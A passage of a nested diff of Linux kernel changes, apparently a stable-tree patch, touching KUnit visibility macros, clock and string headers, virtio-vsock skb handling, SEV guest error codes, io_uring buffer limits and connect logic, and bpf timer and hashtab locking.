++/* SPDX-License-Identifier: GPL-2.0 */
++/*
++ * KUnit API to allow symbols to be conditionally visible during KUnit
++ * testing
++ *
++ * Copyright (C) 2022, Google LLC.
++ * Author: Rae Moar <rmoar@google.com>
++ */
++
++#ifndef _KUNIT_VISIBILITY_H
++#define _KUNIT_VISIBILITY_H
++
++#if IS_ENABLED(CONFIG_KUNIT)
++    /**
++     * VISIBLE_IF_KUNIT - A macro that sets symbols to be static if
++     * CONFIG_KUNIT is not enabled. Otherwise if CONFIG_KUNIT is enabled
++     * there is no change to the symbol definition.
++     */
++    #define VISIBLE_IF_KUNIT
++    /**
++     * EXPORT_SYMBOL_IF_KUNIT(symbol) - Exports symbol into
++     * EXPORTED_FOR_KUNIT_TESTING namespace only if CONFIG_KUNIT is
++     * enabled. Must use MODULE_IMPORT_NS(EXPORTED_FOR_KUNIT_TESTING)
++     * in test file in order to use symbols.
++     */
++    #define EXPORT_SYMBOL_IF_KUNIT(symbol) EXPORT_SYMBOL_NS(symbol, \
++	    EXPORTED_FOR_KUNIT_TESTING)
++#else
++    #define VISIBLE_IF_KUNIT static
++    #define EXPORT_SYMBOL_IF_KUNIT(symbol)
++#endif
++
++#endif /* _KUNIT_VISIBILITY_H */
+diff --git a/include/linux/clk-provider.h b/include/linux/clk-provider.h
+index aefb06373720f..15e336281d1f4 100644
+--- a/include/linux/clk-provider.h
++++ b/include/linux/clk-provider.h
+@@ -72,7 +72,7 @@ void clk_hw_forward_rate_request(const struct clk_hw *core,
+ 				 unsigned long parent_rate);
+ 
+ /**
+- * struct clk_duty - Struture encoding the duty cycle ratio of a clock
++ * struct clk_duty - Structure encoding the duty cycle ratio of a clock
+  *
+  * @num:	Numerator of the duty cycle ratio
+  * @den:	Denominator of the duty cycle ratio
+@@ -127,7 +127,7 @@ struct clk_duty {
+  * @restore_context: Restore the context of the clock after a restoration
+  *		of power.
+  *
+- * @recalc_rate	Recalculate the rate of this clock, by querying hardware. The
++ * @recalc_rate: Recalculate the rate of this clock, by querying hardware. The
+  *		parent rate is an input parameter.  It is up to the caller to
+  *		ensure that the prepare_mutex is held across this call. If the
+  *		driver cannot figure out a rate for this clock, it must return
+@@ -454,7 +454,7 @@ struct clk *clk_register_fixed_rate(struct device *dev, const char *name,
+  * clock with the clock framework
+  * @dev: device that is registering this clock
+  * @name: name of this clock
+- * @parent_name: name of clock's parent
++ * @parent_data: name of clock's parent
+  * @flags: framework-specific flags
+  * @fixed_rate: non-adjustable clock rate
+  * @fixed_accuracy: non-adjustable clock accuracy
+@@ -469,7 +469,7 @@ struct clk *clk_register_fixed_rate(struct device *dev, const char *name,
+  * the clock framework
+  * @dev: device that is registering this clock
+  * @name: name of this clock
+- * @parent_name: name of clock's parent
++ * @parent_data: name of clock's parent
+  * @flags: framework-specific flags
+  * @fixed_rate: non-adjustable clock rate
+  */
+@@ -628,7 +628,7 @@ struct clk_div_table {
+  * Clock with an adjustable divider affecting its output frequency.  Implements
+  * .recalc_rate, .set_rate and .round_rate
+  *
+- * Flags:
++ * @flags:
+  * CLK_DIVIDER_ONE_BASED - by default the divisor is the value read from the
+  *	register plus one.  If CLK_DIVIDER_ONE_BASED is set then the divider is
+  *	the raw value read from the register, with the value of zero considered
+@@ -1109,11 +1109,12 @@ struct clk_hw *clk_hw_register_fixed_factor_parent_hw(struct device *dev,
+  * @mwidth:	width of the numerator bit field
+  * @nshift:	shift to the denominator bit field
+  * @nwidth:	width of the denominator bit field
++ * @approximation: clk driver's callback for calculating the divider clock
+  * @lock:	register lock
+  *
+  * Clock with adjustable fractional divider affecting its output frequency.
+  *
+- * Flags:
++ * @flags:
+  * CLK_FRAC_DIVIDER_ZERO_BASED - by default the numerator and denominator
+  *	is the value read from the register. If CLK_FRAC_DIVIDER_ZERO_BASED
+  *	is set then the numerator and denominator are both the value read
+@@ -1172,7 +1173,7 @@ void clk_hw_unregister_fractional_divider(struct clk_hw *hw);
+  * Clock with an adjustable multiplier affecting its output frequency.
+  * Implements .recalc_rate, .set_rate and .round_rate
+  *
+- * Flags:
++ * @flags:
+  * CLK_MULTIPLIER_ZERO_BYPASS - By default, the multiplier is the value read
+  *	from the register, with 0 being a valid value effectively
+  *	zeroing the output clock rate. If CLK_MULTIPLIER_ZERO_BYPASS is
+diff --git a/include/linux/cpuhotplug.h b/include/linux/cpuhotplug.h
+index 2be2091c2b447..c7e0d80dbf6a5 100644
+--- a/include/linux/cpuhotplug.h
++++ b/include/linux/cpuhotplug.h
+@@ -191,6 +191,7 @@ enum cpuhp_state {
+ 	/* Must be the last timer callback */
+ 	CPUHP_AP_DUMMY_TIMER_STARTING,
+ 	CPUHP_AP_ARM_XEN_STARTING,
++	CPUHP_AP_ARM_XEN_RUNSTATE_STARTING,
+ 	CPUHP_AP_ARM_CORESIGHT_STARTING,
+ 	CPUHP_AP_ARM_CORESIGHT_CTI_STARTING,
+ 	CPUHP_AP_ARM64_ISNDEP_STARTING,
+diff --git a/include/linux/hisi_acc_qm.h b/include/linux/hisi_acc_qm.h
+index c3618255b1504..41203ce27d64c 100644
+--- a/include/linux/hisi_acc_qm.h
++++ b/include/linux/hisi_acc_qm.h
+@@ -145,6 +145,13 @@ enum qm_vf_state {
+ 	QM_NOT_READY,
+ };
+ 
++enum qm_misc_ctl_bits {
++	QM_DRIVER_REMOVING = 0x0,
++	QM_RST_SCHED,
++	QM_RESETTING,
++	QM_MODULE_PARAM,
++};
++
+ enum qm_cap_bits {
+ 	QM_SUPPORT_DB_ISOLATION = 0x0,
+ 	QM_SUPPORT_FUNC_QOS,
+@@ -471,11 +478,11 @@ int hisi_qm_sriov_disable(struct pci_dev *pdev, bool is_frozen);
+ int hisi_qm_sriov_configure(struct pci_dev *pdev, int num_vfs);
+ void hisi_qm_dev_err_init(struct hisi_qm *qm);
+ void hisi_qm_dev_err_uninit(struct hisi_qm *qm);
+-int hisi_qm_diff_regs_init(struct hisi_qm *qm,
+-		struct dfx_diff_registers *dregs, int reg_len);
+-void hisi_qm_diff_regs_uninit(struct hisi_qm *qm, int reg_len);
++int hisi_qm_regs_debugfs_init(struct hisi_qm *qm,
++			  struct dfx_diff_registers *dregs, u32 reg_len);
++void hisi_qm_regs_debugfs_uninit(struct hisi_qm *qm, u32 reg_len);
+ void hisi_qm_acc_diff_regs_dump(struct hisi_qm *qm, struct seq_file *s,
+-		struct dfx_diff_registers *dregs, int regs_len);
++				struct dfx_diff_registers *dregs, u32 regs_len);
+ 
+ pci_ers_result_t hisi_qm_dev_err_detected(struct pci_dev *pdev,
+ 					  pci_channel_state_t state);
+diff --git a/include/linux/hw_random.h b/include/linux/hw_random.h
+index 77c2885c4c130..2505d58bd5829 100644
+--- a/include/linux/hw_random.h
++++ b/include/linux/hw_random.h
+@@ -63,5 +63,6 @@ extern void hwrng_unregister(struct hwrng *rng);
+ extern void devm_hwrng_unregister(struct device *dve, struct hwrng *rng);
+ 
+ extern long hwrng_msleep(struct hwrng *rng, unsigned int msecs);
++extern long hwrng_yield(struct hwrng *rng);
+ 
+ #endif /* LINUX_HWRANDOM_H_ */
+diff --git a/include/linux/idr.h b/include/linux/idr.h
+index a0dce14090a9e..da5f5fa4a3a6a 100644
+--- a/include/linux/idr.h
++++ b/include/linux/idr.h
+@@ -200,7 +200,7 @@ static inline void idr_preload_end(void)
+  */
+ #define idr_for_each_entry_ul(idr, entry, tmp, id)			\
+ 	for (tmp = 0, id = 0;						\
+-	     tmp <= id && ((entry) = idr_get_next_ul(idr, &(id))) != NULL; \
++	     ((entry) = tmp <= id ? idr_get_next_ul(idr, &(id)) : NULL) != NULL; \
+ 	     tmp = id, ++id)
+ 
+ /**
+@@ -224,10 +224,12 @@ static inline void idr_preload_end(void)
+  * @id: Entry ID.
+  *
+  * Continue to iterate over entries, continuing after the current position.
++ * After normal termination @entry is left with the value NULL.  This
++ * is convenient for a "not found" value.
+  */
+ #define idr_for_each_entry_continue_ul(idr, entry, tmp, id)		\
+ 	for (tmp = id;							\
+-	     tmp <= id && ((entry) = idr_get_next_ul(idr, &(id))) != NULL; \
++	     ((entry) = tmp <= id ? idr_get_next_ul(idr, &(id)) : NULL) != NULL; \
+ 	     tmp = id, ++id)
+ 
+ /*
+diff --git a/include/linux/mfd/core.h b/include/linux/mfd/core.h
+index 0bc7cba798a34..b449765b5cac1 100644
+--- a/include/linux/mfd/core.h
++++ b/include/linux/mfd/core.h
+@@ -92,7 +92,7 @@ struct mfd_cell {
+ 	 * (above) when matching OF nodes with devices that have identical
+ 	 * compatible strings
+ 	 */
+-	const u64 of_reg;
++	u64 of_reg;
+ 
+ 	/* Set to 'true' to use 'of_reg' (above) - allows for of_reg=0 */
+ 	bool use_of_reg;
+diff --git a/include/linux/netdevice.h b/include/linux/netdevice.h
+index 5a04fbf724768..0373e09359905 100644
+--- a/include/linux/netdevice.h
++++ b/include/linux/netdevice.h
+@@ -5190,5 +5190,6 @@ extern struct net_device *blackhole_netdev;
+ #define DEV_STATS_INC(DEV, FIELD) atomic_long_inc(&(DEV)->stats.__##FIELD)
+ #define DEV_STATS_ADD(DEV, FIELD, VAL) 	\
+ 		atomic_long_add((VAL), &(DEV)->stats.__##FIELD)
++#define DEV_STATS_READ(DEV, FIELD) atomic_long_read(&(DEV)->stats.__##FIELD)
+ 
+ #endif	/* _LINUX_NETDEVICE_H */
+diff --git a/include/linux/numa.h b/include/linux/numa.h
+index 59df211d051fa..0f512c0aba54b 100644
+--- a/include/linux/numa.h
++++ b/include/linux/numa.h
+@@ -12,6 +12,7 @@
+ #define MAX_NUMNODES    (1 << NODES_SHIFT)
+ 
+ #define	NUMA_NO_NODE	(-1)
++#define	NUMA_NO_MEMBLK	(-1)
+ 
+ /* optionally keep NUMA memory info available post init */
+ #ifdef CONFIG_NUMA_KEEP_MEMINFO
+@@ -43,6 +44,12 @@ static inline int phys_to_target_node(u64 start)
+ 	return 0;
+ }
+ #endif
++#ifndef numa_fill_memblks
++static inline int __init numa_fill_memblks(u64 start, u64 end)
++{
++	return NUMA_NO_MEMBLK;
++}
++#endif
+ #else /* !CONFIG_NUMA */
+ static inline int numa_map_to_online_node(int node)
+ {
+diff --git a/include/linux/pagemap.h b/include/linux/pagemap.h
+index bbccb40442224..03307b72de6c6 100644
+--- a/include/linux/pagemap.h
++++ b/include/linux/pagemap.h
+@@ -720,6 +720,8 @@ unsigned filemap_get_folios(struct address_space *mapping, pgoff_t *start,
+ 		pgoff_t end, struct folio_batch *fbatch);
+ unsigned filemap_get_folios_contig(struct address_space *mapping,
+ 		pgoff_t *start, pgoff_t end, struct folio_batch *fbatch);
++unsigned filemap_get_folios_tag(struct address_space *mapping, pgoff_t *start,
++		pgoff_t end, xa_mark_t tag, struct folio_batch *fbatch);
+ unsigned find_get_pages_range_tag(struct address_space *mapping, pgoff_t *index,
+ 			pgoff_t end, xa_mark_t tag, unsigned int nr_pages,
+ 			struct page **pages);
+diff --git a/include/linux/string.h b/include/linux/string.h
+index cf7607b321027..26ab8928d8661 100644
+--- a/include/linux/string.h
++++ b/include/linux/string.h
+@@ -276,10 +276,12 @@ void memcpy_and_pad(void *dest, size_t dest_len, const void *src, size_t count,
+  */
+ #define strtomem_pad(dest, src, pad)	do {				\
+ 	const size_t _dest_len = __builtin_object_size(dest, 1);	\
++	const size_t _src_len = __builtin_object_size(src, 1);		\
+ 									\
+ 	BUILD_BUG_ON(!__builtin_constant_p(_dest_len) ||		\
+ 		     _dest_len == (size_t)-1);				\
+-	memcpy_and_pad(dest, _dest_len, src, strnlen(src, _dest_len), pad); \
++	memcpy_and_pad(dest, _dest_len, src,				\
++		       strnlen(src, min(_src_len, _dest_len)), pad);	\
+ } while (0)
+ 
+ /**
+@@ -297,10 +299,11 @@ void memcpy_and_pad(void *dest, size_t dest_len, const void *src, size_t count,
+  */
+ #define strtomem(dest, src)	do {					\
+ 	const size_t _dest_len = __builtin_object_size(dest, 1);	\
++	const size_t _src_len = __builtin_object_size(src, 1);		\
+ 									\
+ 	BUILD_BUG_ON(!__builtin_constant_p(_dest_len) ||		\
+ 		     _dest_len == (size_t)-1);				\
+-	memcpy(dest, src, min(_dest_len, strnlen(src, _dest_len)));	\
++	memcpy(dest, src, strnlen(src, min(_src_len, _dest_len)));	\
+ } while (0)
+ 
+ /**
+diff --git a/include/linux/verification.h b/include/linux/verification.h
+index f34e50ebcf60a..cb2d47f280910 100644
+--- a/include/linux/verification.h
++++ b/include/linux/verification.h
+@@ -8,6 +8,7 @@
+ #ifndef _LINUX_VERIFICATION_H
+ #define _LINUX_VERIFICATION_H
+ 
++#include <linux/errno.h>
+ #include <linux/types.h>
+ 
+ /*
+diff --git a/include/linux/virtio_vsock.h b/include/linux/virtio_vsock.h
+index 35d7eedb5e8e4..3f9c166113063 100644
+--- a/include/linux/virtio_vsock.h
++++ b/include/linux/virtio_vsock.h
+@@ -7,6 +7,109 @@
+ #include <net/sock.h>
+ #include <net/af_vsock.h>
+ 
++#define VIRTIO_VSOCK_SKB_HEADROOM (sizeof(struct virtio_vsock_hdr))
++
++struct virtio_vsock_skb_cb {
++	bool reply;
++	bool tap_delivered;
++};
++
++#define VIRTIO_VSOCK_SKB_CB(skb) ((struct virtio_vsock_skb_cb *)((skb)->cb))
++
++static inline struct virtio_vsock_hdr *virtio_vsock_hdr(struct sk_buff *skb)
++{
++	return (struct virtio_vsock_hdr *)skb->head;
++}
++
++static inline bool virtio_vsock_skb_reply(struct sk_buff *skb)
++{
++	return VIRTIO_VSOCK_SKB_CB(skb)->reply;
++}
++
++static inline void virtio_vsock_skb_set_reply(struct sk_buff *skb)
++{
++	VIRTIO_VSOCK_SKB_CB(skb)->reply = true;
++}
++
++static inline bool virtio_vsock_skb_tap_delivered(struct sk_buff *skb)
++{
++	return VIRTIO_VSOCK_SKB_CB(skb)->tap_delivered;
++}
++
++static inline void virtio_vsock_skb_set_tap_delivered(struct sk_buff *skb)
++{
++	VIRTIO_VSOCK_SKB_CB(skb)->tap_delivered = true;
++}
++
++static inline void virtio_vsock_skb_clear_tap_delivered(struct sk_buff *skb)
++{
++	VIRTIO_VSOCK_SKB_CB(skb)->tap_delivered = false;
++}
++
++static inline void virtio_vsock_skb_rx_put(struct sk_buff *skb)
++{
++	u32 len;
++
++	len = le32_to_cpu(virtio_vsock_hdr(skb)->len);
++
++	if (len > 0)
++		skb_put(skb, len);
++}
++
++static inline struct sk_buff *virtio_vsock_alloc_skb(unsigned int size, gfp_t mask)
++{
++	struct sk_buff *skb;
++
++	if (size < VIRTIO_VSOCK_SKB_HEADROOM)
++		return NULL;
++
++	skb = alloc_skb(size, mask);
++	if (!skb)
++		return NULL;
++
++	skb_reserve(skb, VIRTIO_VSOCK_SKB_HEADROOM);
++	return skb;
++}
++
++static inline void
++virtio_vsock_skb_queue_head(struct sk_buff_head *list, struct sk_buff *skb)
++{
++	spin_lock_bh(&list->lock);
++	__skb_queue_head(list, skb);
++	spin_unlock_bh(&list->lock);
++}
++
++static inline void
++virtio_vsock_skb_queue_tail(struct sk_buff_head *list, struct sk_buff *skb)
++{
++	spin_lock_bh(&list->lock);
++	__skb_queue_tail(list, skb);
++	spin_unlock_bh(&list->lock);
++}
++
++static inline struct sk_buff *virtio_vsock_skb_dequeue(struct sk_buff_head *list)
++{
++	struct sk_buff *skb;
++
++	spin_lock_bh(&list->lock);
++	skb = __skb_dequeue(list);
++	spin_unlock_bh(&list->lock);
++
++	return skb;
++}
++
++static inline void virtio_vsock_skb_queue_purge(struct sk_buff_head *list)
++{
++	spin_lock_bh(&list->lock);
++	__skb_queue_purge(list);
++	spin_unlock_bh(&list->lock);
++}
++
++static inline size_t virtio_vsock_skb_len(struct sk_buff *skb)
++{
++	return (size_t)(skb_end_pointer(skb) - skb->head);
++}
++
+ #define VIRTIO_VSOCK_DEFAULT_RX_BUF_SIZE	(1024 * 4)
+ #define VIRTIO_VSOCK_MAX_BUF_SIZE		0xFFFFFFFFUL
+ #define VIRTIO_VSOCK_MAX_PKT_BUF_SIZE		(1024 * 64)
+@@ -35,23 +138,10 @@ struct virtio_vsock_sock {
+ 	u32 last_fwd_cnt;
+ 	u32 rx_bytes;
+ 	u32 buf_alloc;
+-	struct list_head rx_queue;
++	struct sk_buff_head rx_queue;
+ 	u32 msg_count;
+ };
+ 
+-struct virtio_vsock_pkt {
+-	struct virtio_vsock_hdr	hdr;
+-	struct list_head list;
+-	/* socket refcnt not held, only use for cancellation */
+-	struct vsock_sock *vsk;
+-	void *buf;
+-	u32 buf_len;
+-	u32 len;
+-	u32 off;
+-	bool reply;
+-	bool tap_delivered;
+-};
+-
+ struct virtio_vsock_pkt_info {
+ 	u32 remote_cid, remote_port;
+ 	struct vsock_sock *vsk;
+@@ -68,7 +158,7 @@ struct virtio_transport {
+ 	struct vsock_transport transport;
+ 
+ 	/* Takes ownership of the packet */
+-	int (*send_pkt)(struct virtio_vsock_pkt *pkt);
++	int (*send_pkt)(struct sk_buff *skb);
+ };
+ 
+ ssize_t
+@@ -149,11 +239,10 @@ virtio_transport_dgram_enqueue(struct vsock_sock *vsk,
+ void virtio_transport_destruct(struct vsock_sock *vsk);
+ 
+ void virtio_transport_recv_pkt(struct virtio_transport *t,
+-			       struct virtio_vsock_pkt *pkt);
+-void virtio_transport_free_pkt(struct virtio_vsock_pkt *pkt);
+-void virtio_transport_inc_tx_pkt(struct virtio_vsock_sock *vvs, struct virtio_vsock_pkt *pkt);
++			       struct sk_buff *skb);
++void virtio_transport_inc_tx_pkt(struct virtio_vsock_sock *vvs, struct sk_buff *skb);
+ u32 virtio_transport_get_credit(struct virtio_vsock_sock *vvs, u32 wanted);
+ void virtio_transport_put_credit(struct virtio_vsock_sock *vvs, u32 credit);
+-void virtio_transport_deliver_tap_pkt(struct virtio_vsock_pkt *pkt);
+-
++void virtio_transport_deliver_tap_pkt(struct sk_buff *skb);
++int virtio_transport_purge_skbs(void *vsk, struct sk_buff_head *list);
+ #endif /* _LINUX_VIRTIO_VSOCK_H */
+diff --git a/include/net/cfg80211.h b/include/net/cfg80211.h
+index 7a6c3059d50b5..5bf5c1ab542ce 100644
+--- a/include/net/cfg80211.h
++++ b/include/net/cfg80211.h
+@@ -5690,6 +5690,16 @@ void wiphy_work_queue(struct wiphy *wiphy, struct wiphy_work *work);
+  */
+ void wiphy_work_cancel(struct wiphy *wiphy, struct wiphy_work *work);
+ 
++/**
++ * wiphy_work_flush - flush previously queued work
++ * @wiphy: the wiphy, for debug purposes
++ * @work: the work to flush, this can be %NULL to flush all work
++ *
++ * Flush the work (i.e. run it if pending). This must be called
++ * under the wiphy mutex acquired by wiphy_lock().
++ */
++void wiphy_work_flush(struct wiphy *wiphy, struct wiphy_work *work);
++
+ struct wiphy_delayed_work {
+ 	struct wiphy_work work;
+ 	struct wiphy *wiphy;
+@@ -5733,6 +5743,17 @@ void wiphy_delayed_work_queue(struct wiphy *wiphy,
+ void wiphy_delayed_work_cancel(struct wiphy *wiphy,
+ 			       struct wiphy_delayed_work *dwork);
+ 
++/**
++ * wiphy_delayed_work_flush - flush previously queued delayed work
++ * @wiphy: the wiphy, for debug purposes
++ * @work: the work to flush
++ *
++ * Flush the work (i.e. run it if pending). This must be called
++ * under the wiphy mutex acquired by wiphy_lock().
++ */
++void wiphy_delayed_work_flush(struct wiphy *wiphy,
++			      struct wiphy_delayed_work *dwork);
++
+ /**
+  * struct wireless_dev - wireless device state
+  *
+diff --git a/include/net/flow.h b/include/net/flow.h
+index 2f0da4f0318b5..079cc493fe67d 100644
+--- a/include/net/flow.h
++++ b/include/net/flow.h
+@@ -39,8 +39,8 @@ struct flowi_common {
+ #define FLOWI_FLAG_KNOWN_NH		0x02
+ 	__u32	flowic_secid;
+ 	kuid_t  flowic_uid;
+-	struct flowi_tunnel flowic_tun_key;
+ 	__u32		flowic_multipath_hash;
++	struct flowi_tunnel flowic_tun_key;
+ };
+ 
+ union flowi_uli {
+diff --git a/include/net/netfilter/nf_nat_redirect.h b/include/net/netfilter/nf_nat_redirect.h
+index 2418653a66db1..279380de904c8 100644
+--- a/include/net/netfilter/nf_nat_redirect.h
++++ b/include/net/netfilter/nf_nat_redirect.h
+@@ -6,8 +6,7 @@
+ #include <uapi/linux/netfilter/nf_nat.h>
+ 
+ unsigned int
+-nf_nat_redirect_ipv4(struct sk_buff *skb,
+-		     const struct nf_nat_ipv4_multi_range_compat *mr,
++nf_nat_redirect_ipv4(struct sk_buff *skb, const struct nf_nat_range2 *range,
+ 		     unsigned int hooknum);
+ unsigned int
+ nf_nat_redirect_ipv6(struct sk_buff *skb, const struct nf_nat_range2 *range,
+diff --git a/include/net/tcp.h b/include/net/tcp.h
+index 548c75c8a34c7..19646fdec23dc 100644
+--- a/include/net/tcp.h
++++ b/include/net/tcp.h
+@@ -810,7 +810,7 @@ static inline u32 tcp_time_stamp(const struct tcp_sock *tp)
+ }
+ 
+ /* Convert a nsec timestamp into TCP TSval timestamp (ms based currently) */
+-static inline u32 tcp_ns_to_ts(u64 ns)
++static inline u64 tcp_ns_to_ts(u64 ns)
+ {
+ 	return div_u64(ns, NSEC_PER_SEC / TCP_TS_HZ);
+ }
+diff --git a/include/uapi/linux/psp-sev.h b/include/uapi/linux/psp-sev.h
+index 91b4c63d5cbf4..1c9da485318f9 100644
+--- a/include/uapi/linux/psp-sev.h
++++ b/include/uapi/linux/psp-sev.h
+@@ -36,6 +36,13 @@ enum {
+  * SEV Firmware status code
+  */
+ typedef enum {
++	/*
++	 * This error code is not in the SEV spec. Its purpose is to convey that
++	 * there was an error that prevented the SEV firmware from being called.
++	 * The SEV API error codes are 16 bits, so the -1 value will not overlap
++	 * with possible values from the specification.
++	 */
++	SEV_RET_NO_FW_CALL = -1,
+ 	SEV_RET_SUCCESS = 0,
+ 	SEV_RET_INVALID_PLATFORM_STATE,
+ 	SEV_RET_INVALID_GUEST_STATE,
+diff --git a/include/uapi/linux/sev-guest.h b/include/uapi/linux/sev-guest.h
+index 256aaeff7e654..2aa39112cf8dd 100644
+--- a/include/uapi/linux/sev-guest.h
++++ b/include/uapi/linux/sev-guest.h
+@@ -52,8 +52,14 @@ struct snp_guest_request_ioctl {
+ 	__u64 req_data;
+ 	__u64 resp_data;
+ 
+-	/* firmware error code on failure (see psp-sev.h) */
+-	__u64 fw_err;
++	/* bits[63:32]: VMM error code, bits[31:0] firmware error code (see psp-sev.h) */
++	union {
++		__u64 exitinfo2;
++		struct {
++			__u32 fw_error;
++			__u32 vmm_error;
++		};
++	};
+ };
+ 
+ struct snp_ext_report_req {
+@@ -77,4 +83,12 @@ struct snp_ext_report_req {
+ /* Get SNP extended report as defined in the GHCB specification version 2. */
+ #define SNP_GET_EXT_REPORT _IOWR(SNP_GUEST_REQ_IOC_TYPE, 0x2, struct snp_guest_request_ioctl)
+ 
++/* Guest message request EXIT_INFO_2 constants */
++#define SNP_GUEST_FW_ERR_MASK		GENMASK_ULL(31, 0)
++#define SNP_GUEST_VMM_ERR_SHIFT		32
++#define SNP_GUEST_VMM_ERR(x)		(((u64)x) << SNP_GUEST_VMM_ERR_SHIFT)
++
++#define SNP_GUEST_VMM_ERR_INVALID_LEN	1
++#define SNP_GUEST_VMM_ERR_BUSY		2
++
+ #endif /* __UAPI_LINUX_SEV_GUEST_H_ */
+diff --git a/io_uring/kbuf.c b/io_uring/kbuf.c
+index acc37e5a6d4e1..57ef6850c6a87 100644
+--- a/io_uring/kbuf.c
++++ b/io_uring/kbuf.c
+@@ -19,12 +19,15 @@
+ 
+ #define BGID_ARRAY	64
+ 
++/* BIDs are addressed by a 16-bit field in a CQE */
++#define MAX_BIDS_PER_BGID (1 << 16)
++
+ struct io_provide_buf {
+ 	struct file			*file;
+ 	__u64				addr;
+ 	__u32				len;
+ 	__u32				bgid;
+-	__u16				nbufs;
++	__u32				nbufs;
+ 	__u16				bid;
+ };
+ 
+@@ -281,7 +284,7 @@ int io_remove_buffers_prep(struct io_kiocb *req, const struct io_uring_sqe *sqe)
+ 		return -EINVAL;
+ 
+ 	tmp = READ_ONCE(sqe->fd);
+-	if (!tmp || tmp > USHRT_MAX)
++	if (!tmp || tmp > MAX_BIDS_PER_BGID)
+ 		return -EINVAL;
+ 
+ 	memset(p, 0, sizeof(*p));
+@@ -327,7 +330,7 @@ int io_provide_buffers_prep(struct io_kiocb *req, const struct io_uring_sqe *sqe
+ 		return -EINVAL;
+ 
+ 	tmp = READ_ONCE(sqe->fd);
+-	if (!tmp || tmp > USHRT_MAX)
++	if (!tmp || tmp > MAX_BIDS_PER_BGID)
+ 		return -E2BIG;
+ 	p->nbufs = tmp;
+ 	p->addr = READ_ONCE(sqe->addr);
+@@ -347,7 +350,7 @@ int io_provide_buffers_prep(struct io_kiocb *req, const struct io_uring_sqe *sqe
+ 	tmp = READ_ONCE(sqe->off);
+ 	if (tmp > USHRT_MAX)
+ 		return -E2BIG;
+-	if (tmp + p->nbufs >= USHRT_MAX)
++	if (tmp + p->nbufs > MAX_BIDS_PER_BGID)
+ 		return -EINVAL;
+ 	p->bid = tmp;
+ 	return 0;
+diff --git a/io_uring/net.c b/io_uring/net.c
+index 9fe1aada3ad00..57c626cb4d1a5 100644
+--- a/io_uring/net.c
++++ b/io_uring/net.c
+@@ -1433,16 +1433,6 @@ int io_connect(struct io_kiocb *req, unsigned int issue_flags)
+ 	int ret;
+ 	bool force_nonblock = issue_flags & IO_URING_F_NONBLOCK;
+ 
+-	if (connect->in_progress) {
+-		struct socket *socket;
+-
+-		ret = -ENOTSOCK;
+-		socket = sock_from_file(req->file);
+-		if (socket)
+-			ret = sock_error(socket->sk);
+-		goto out;
+-	}
+-
+ 	if (req_has_async_data(req)) {
+ 		io = req->async_data;
+ 	} else {
+@@ -1462,9 +1452,7 @@ int io_connect(struct io_kiocb *req, unsigned int issue_flags)
+ 	    && force_nonblock) {
+ 		if (ret == -EINPROGRESS) {
+ 			connect->in_progress = true;
+-			return -EAGAIN;
+-		}
+-		if (ret == -ECONNABORTED) {
++		} else if (ret == -ECONNABORTED) {
+ 			if (connect->seen_econnaborted)
+ 				goto out;
+ 			connect->seen_econnaborted = true;
+@@ -1478,6 +1466,16 @@ int io_connect(struct io_kiocb *req, unsigned int issue_flags)
+ 		memcpy(req->async_data, &__io, sizeof(__io));
+ 		return -EAGAIN;
+ 	}
++	if (connect->in_progress) {
++		/*
++		 * At least bluetooth will return -EBADFD on a re-connect
++		 * attempt, and it's (supposedly) also valid to get -EISCONN
++		 * which means the previous result is good. For both of these,
++		 * grab the sock_error() and use that for the completion.
++		 */
++		if (ret == -EBADFD || ret == -EISCONN)
++			ret = sock_error(sock_from_file(req->file)->sk);
++	}
+ 	if (ret == -ERESTARTSYS)
+ 		ret = -EINTR;
+ out:
+diff --git a/kernel/bpf/hashtab.c b/kernel/bpf/hashtab.c
+index e4e7f343346f9..ce0051eee746e 100644
+--- a/kernel/bpf/hashtab.c
++++ b/kernel/bpf/hashtab.c
+@@ -155,13 +155,15 @@ static inline int htab_lock_bucket(const struct bpf_htab *htab,
+ 	hash = hash & min_t(u32, HASHTAB_MAP_LOCK_MASK, htab->n_buckets - 1);
+ 
+ 	preempt_disable();
++	local_irq_save(flags);
+ 	if (unlikely(__this_cpu_inc_return(*(htab->map_locked[hash])) != 1)) {
+ 		__this_cpu_dec(*(htab->map_locked[hash]));
++		local_irq_restore(flags);
+ 		preempt_enable();
+ 		return -EBUSY;
+ 	}
+ 
+-	raw_spin_lock_irqsave(&b->raw_lock, flags);
++	raw_spin_lock(&b->raw_lock);
+ 	*pflags = flags;
+ 
+ 	return 0;
+@@ -172,8 +174,9 @@ static inline void htab_unlock_bucket(const struct bpf_htab *htab,
+ 				      unsigned long flags)
+ {
+ 	hash = hash & min_t(u32, HASHTAB_MAP_LOCK_MASK, htab->n_buckets - 1);
+-	raw_spin_unlock_irqrestore(&b->raw_lock, flags);
++	raw_spin_unlock(&b->raw_lock);
+ 	__this_cpu_dec(*(htab->map_locked[hash]));
++	local_irq_restore(flags);
+ 	preempt_enable();
+ }
+ 
+diff --git a/kernel/bpf/helpers.c b/kernel/bpf/helpers.c
+index a6b04faed282b..6212e4ae084bb 100644
+--- a/kernel/bpf/helpers.c
++++ b/kernel/bpf/helpers.c
+@@ -1156,13 +1156,6 @@ BPF_CALL_3(bpf_timer_init, struct bpf_timer_kern *, timer, struct bpf_map *, map
+ 		ret = -EBUSY;
+ 		goto out;
+ 	}
+-	if (!atomic64_read(&map->usercnt)) {
+-		/* maps with timers must be either held by user space
+-		 * or pinned in bpffs.
+-		 */
+-		ret = -EPERM;
+-		goto out;
+-	}
+ 	/* allocate hrtimer via map_kmalloc to use memcg accounting */
+ 	t = bpf_map_kmalloc_node(map, sizeof(*t), GFP_ATOMIC, map->numa_node);
+ 	if (!t) {
+@@ -1175,7 +1168,21 @@ BPF_CALL_3(bpf_timer_init, struct bpf_timer_kern *, timer, struct bpf_map *, map
+ 	rcu_assign_pointer(t->callback_fn, NULL);
+ 	hrtimer_init(&t->timer, clockid, HRTIMER_MODE_REL_SOFT);
+ 	t->timer.function = bpf_timer_cb;
+-	timer->timer = t;
++	WRITE_ONCE(timer->timer, t);
++	/* Guarantee the order between timer->timer and map->usercnt. So
++	 * when there are concurrent uref release and bpf timer init, either
++	 * bpf_timer_cancel_and_free() called by uref release reads a no-NULL
++	 * timer or atomic64_read() below returns a zero usercnt.
++	 */
++	smp_mb();
++	if (!atomic64_read(&map->usercnt)) {
++		/* maps with timers must be either held by user space
++		 * or pinned in bpffs.
++		 */
++		WRITE_ONCE(timer->timer, NULL);
++		kfree(t);
++		ret = -EPERM;
++	}
+ out:
+ 	__bpf_spin_unlock_irqrestore(&timer->lock);
+ 	return ret;
+@@ -1343,7 +1350,7 @@ void bpf_timer_cancel_and_free(void *val)
